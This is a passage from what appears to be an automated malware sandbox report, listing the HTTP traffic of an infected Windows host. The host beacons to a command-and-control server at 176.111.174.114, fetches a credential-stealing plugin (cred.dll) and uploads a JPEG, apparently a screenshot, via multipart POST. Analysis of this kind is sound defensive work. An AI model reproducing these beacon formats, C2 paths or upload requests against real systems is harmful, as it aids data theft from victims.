                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          497176.111.174.11480192.168.2.450048C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:29.331248045 CEST12366INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:29 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          498192.168.2.450049176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:29.614089012 CEST12379OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227735
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:29.713893890 CEST12382OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:29.714005947 CEST12385OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:29.714220047 CEST12387OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:29.714561939 CEST12390OUTData Raw: 0a 9e ad 76 e9 0e 3f 07 20 fe 95 d2 e9 9f b2 8f 8e 27 c3 6a da d6 9d 6a bd d5 19 e4 61 f8 60 0f d6 b8 2b 67 59 4e 1f e3 ad 1f 93 bb fb 95 ce 39 e3 70 90 de 6b ef bf e4 79 38 fb c3 e9 4e ab fe 25 d1 8e 81 e2 1b ed 0b ed 1e 69 b1 bc 96 dc cb b7 6e
                                                                                                                                          Data Ascii: v? 'jja`+gYN9pky8N%inW8qU-(J3vgJjJf)jJ*RQSj)Ny~yOT.aSv5TH/~UO0GY#|N^O$\ry?Z]9z<z4o\++IRyo
                                                                                                                                          Apr 28, 2021 23:00:29.714685917 CEST12393OUTData Raw: df b2 d4 e5 a1 97 e2 71 b5 7f 77 6d 64 d7 dc af f9 6c 7e 71 cb fd 6b ed bf f8 26 87 fc 39 af fe 14 4e ad ff 00 0f 0f ff 00 91 d7 fe 12 d9 ff 00 b2 ff 00 e4 61 ff 00 90 5f d9 6d 7c bf f9 06 7e eb fd 77 da 7e f7 cf eb f2 ed ae 56 eb f6 68 f8 1b e0
                                                                                                                                          Data Ascii: qwmdl~qk&9Na_m|~w~Vh$^3d|]5ojW,':1h\u_M[Qhl{mSj^Nx7c|\gxEO;04{I&R7'
                                                                                                                                          Apr 28, 2021 23:00:29.714859009 CEST12396OUTData Raw: 96 26 b9 3f f8 2a 4e 9b fd 89 ff 00 04 9b f8 dd a3 ac fe 6f d9 3e 10 6a 70 89 76 e3 7e db 12 b9 c7 6c e3 a5 7e c3 52 be 06 a5 38 7b 27 ef cb 11 36 d5 ac b9 3d de 47 da ed f3 5d 5f a2 3e 56 85 0c 7d 3a cf da a5 c8 a8 41 27 7b be 7f 7b 9d 77 b5 b9
                                                                                                                                          Data Ascii: &?*No>jpv~l~R8{'6=G]_>V}:A'{{wl+eMLY_l|wj(2"]o-?r?eo?>{GFxAdx?|i6gqC=pYX'S>tcUUu_n
                                                                                                                                          Apr 28, 2021 23:00:29.715363979 CEST12398OUTData Raw: 81 28 65 25 f1 6e c0 0c 16 23 87 fd 8f fc 3f e0 7d 17 f6 14 d4 7e 1f 6b df f0 5b 6d 2b 45 d6 bc 7f e1 2f 0b 4d a0 ad df 8d e2 86 eb e1 df d9 b6 dc 4f 61 6f 1b 6a aa e9 b9 1c 5a ba a7 d9 f0 b1 00 54 8f 90 7a 67 ec 58 7e 15 7e cb 7f 14 75 1f 88 5f
                                                                                                                                          Data Ascii: (e%n#?}~k[m+E/MOaojZTzgX~~u_2XCx&vE.@q3a Vp}}*a'%_4^r?3X?W]"KwXh#A#lECIGu=_=*_/
                                                                                                                                          Apr 28, 2021 23:00:29.715667009 CEST12401OUTData Raw: 42 b8 b6 7b 8b ab 69 bc 8b 88 11 64 45 2f 24 53 7e e9 d0 65 91 fe 56 00 f1 57 22 f8 15 f1 d6 7f 1c e9 5f 0c 21 f8 29 e2 e6 f1 2e bb 71 34 1a 1f 87 57 c3 37 66 fb 51 96 1b 89 ad a5 8e 0b 7f 2f cc 99 92 e2 de 78 58 22 92 b2 41 22 1c 32 30 1d 58 2c
                                                                                                                                          Data Ascii: B{idE/$S~eVW"_!).q4W7fQ/xX"A"20X,Sb)HZ9*+B0*odK7NE,XO!#i]acSM+IFOdFxde2,2yR+J2?
                                                                                                                                          Apr 28, 2021 23:00:29.715864897 CEST12404OUTData Raw: 38 fc ca 4f 24 6f ab e5 33 e6 43 69 eb 1f cd 4f f2 fd ea 48 a3 f6 aa e4 23 9c 89 a3 e7 65 27 91 ef 56 28 ab e5 44 7b 42 1f 2f de 86 80 8f 92 a7 f2 f6 8e 28 fe 0f c6 ab 94 5c e5 63 01 07 9a 77 97 ef 56 44 7b ba a5 23 43 eb 47 28 7b 42 04 8f e6 e6
                                                                                                                                          Data Ascii: 8O$o3CiOH#e'V(D{B/(\cwVD{#CG({BZ#*_/j2U[~gfSz~hR3K4Eg?3*.x4_^OL=FHMEgK5J;B}[IoV|SmVz6?hVh}*6
                                                                                                                                          Apr 28, 2021 23:00:29.716187954 CEST12407OUTData Raw: ac 8d f0 3b f8 73 49 90 00 d6 fd 3b d3 7f b0 74 dc 00 b0 63 1d c7 5a cf fb 03 13 2c 43 ab 2a 8b 5d 5a b6 97 bd 17 a2 be 91 bd 25 65 ab 49 a5 cd ee 45 9a ff 00 6d d0 e4 51 8c 36 4a 3e 76 54 e7 4f 5f ef 35 3b b6 ac 9b 57 71 d4 fb b7 f6 34 d3 b5 49
                                                                                                                                          Data Ascii: ;sI;tcZ,C*]Z%eIEmQ6J>vTO_5;Wq4I<F$]xZLXYvX(d\BlpzO\'eMJ/Dz_^.afH5Dl$M]f"NA&Ybdu9W++%qw6C


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          499176.111.174.11480192.168.2.450049C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:30.117137909 CEST12595INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:29 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          5192.168.2.449751176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:10.249403954 CEST4389OUTGET /Hnq8vS/plugins/cred.dll HTTP/1.1
                                                                                                                                          Host: 176.111.174.114


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          50192.168.2.449773176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:18.544042110 CEST4546OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          500192.168.2.450050176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:30.512340069 CEST12595OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          501176.111.174.11480192.168.2.450050C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:30.610181093 CEST12596INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:30 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          502192.168.2.450052176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:30.867643118 CEST12597OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          503176.111.174.11480192.168.2.450052C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:30.968909025 CEST12597INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:30 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          504192.168.2.450053176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:31.183269024 CEST12598OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
